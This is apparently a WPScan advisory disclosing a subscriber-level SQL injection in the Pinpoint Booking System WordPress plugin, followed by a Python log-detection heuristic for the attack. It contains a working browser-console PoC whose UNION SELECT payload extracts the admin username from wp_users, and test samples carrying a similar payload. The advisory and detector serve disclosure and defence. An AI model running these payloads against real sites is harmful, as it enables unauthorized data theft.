wpvulndb | Lana Codes | WPVDB-ID: D6D976BE-31D1-419D-8729-4A36FBD2755C
Jan 23, 2023 - 12:00 a.m.

Pinpoint Booking System < 2.9.9.2.9 - Subscriber+ SQLi

2023-01-23 00:00:00
Lana Codes
wpscan.com
Tags: sql injection, subscriber, calendar, wordpress, authentication

EPSS

0.001

Percentile

38.3%

The plugin does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated user, such as a subscriber, to perform SQL Injection attacks.

PoC

Note: A Calendar is needed (if there is not one already). Run the below command in the developer console of the web browser while being on the blog as a subscriber:

```javascript
fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded' }),
  body: `action=parse-media-shortcode&shortcode=[dopbs id='1' lang='en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --']`
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
```

The login of the first user (i.e. the admin) will be displayed in the calendar data JSON, within the text[names] attribute.
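As an added, defender-side example that is not part of the advisory: a Python heuristic that flags the request shape above in a WAF or reverse-proxy request log (assumed to record POST bodies; the sample records are constructed). It keys on `[dopbs]` attribute values that carry SQL syntax rather than on the `parse-media-shortcode` action alone, since the WordPress editor uses that core action legitimately.

```python
import re
from urllib.parse import parse_qs

# attribute parser for a single [tag attr='v' attr="v" attr=v] shortcode
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))""")
# SQL syntax that has no business inside a dopbs 'id' or 'lang' attribute
SQL_RE = re.compile(r"(?i)\bunion\b|\bselect\b|--|/\*|['\"]|;")

# Constructed request records (method, path, POST body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php",
     "action=parse-media-shortcode&shortcode=[dopbs id='1' lang='en']"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=parse-media-shortcode&shortcode="
     "[dopbs id='1' lang='en UNION SELECT 1,2 -- ']"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=parse-media-shortcode&shortcode=[gallery ids='1,2']"),
    ("GET", "/?s=dopbs", ""),
]

def shortcode_attrs(shortcode: str):
    """Split '[tag a=1 b="x"]' into ('tag', {'a': '1', 'b': 'x'})."""
    m = re.match(r"\s*\[\s*([\w-]+)(.*?)\]?\s*$", shortcode, re.S)
    if not m:
        return None, {}
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(m.group(2)):
        attrs[name.lower()] = dq or sq or bare
    return m.group(1).lower(), attrs

def is_suspicious(method: str, path: str, body: str) -> bool:
    """True for an admin-ajax shortcode render of [dopbs] whose
    attribute values carry SQL syntax (the vector in the advisory)."""
    if method != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
        return False
    params = parse_qs(body)
    if params.get("action", [""])[0] != "parse-media-shortcode":
        return False
    tag, attrs = shortcode_attrs(params.get("shortcode", [""])[0])
    if tag != "dopbs":
        return False
    return any(SQL_RE.search(value) for value in attrs.values())

def flag_requests(records):
    """Indexes of records worth alerting on."""
    return [i for i, rec in enumerate(records) if is_suspicious(*rec)]
```

Treat a hit as a signal to check the plugin version against the fixed release and to review the requesting account, not as proof of compromise on its own.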
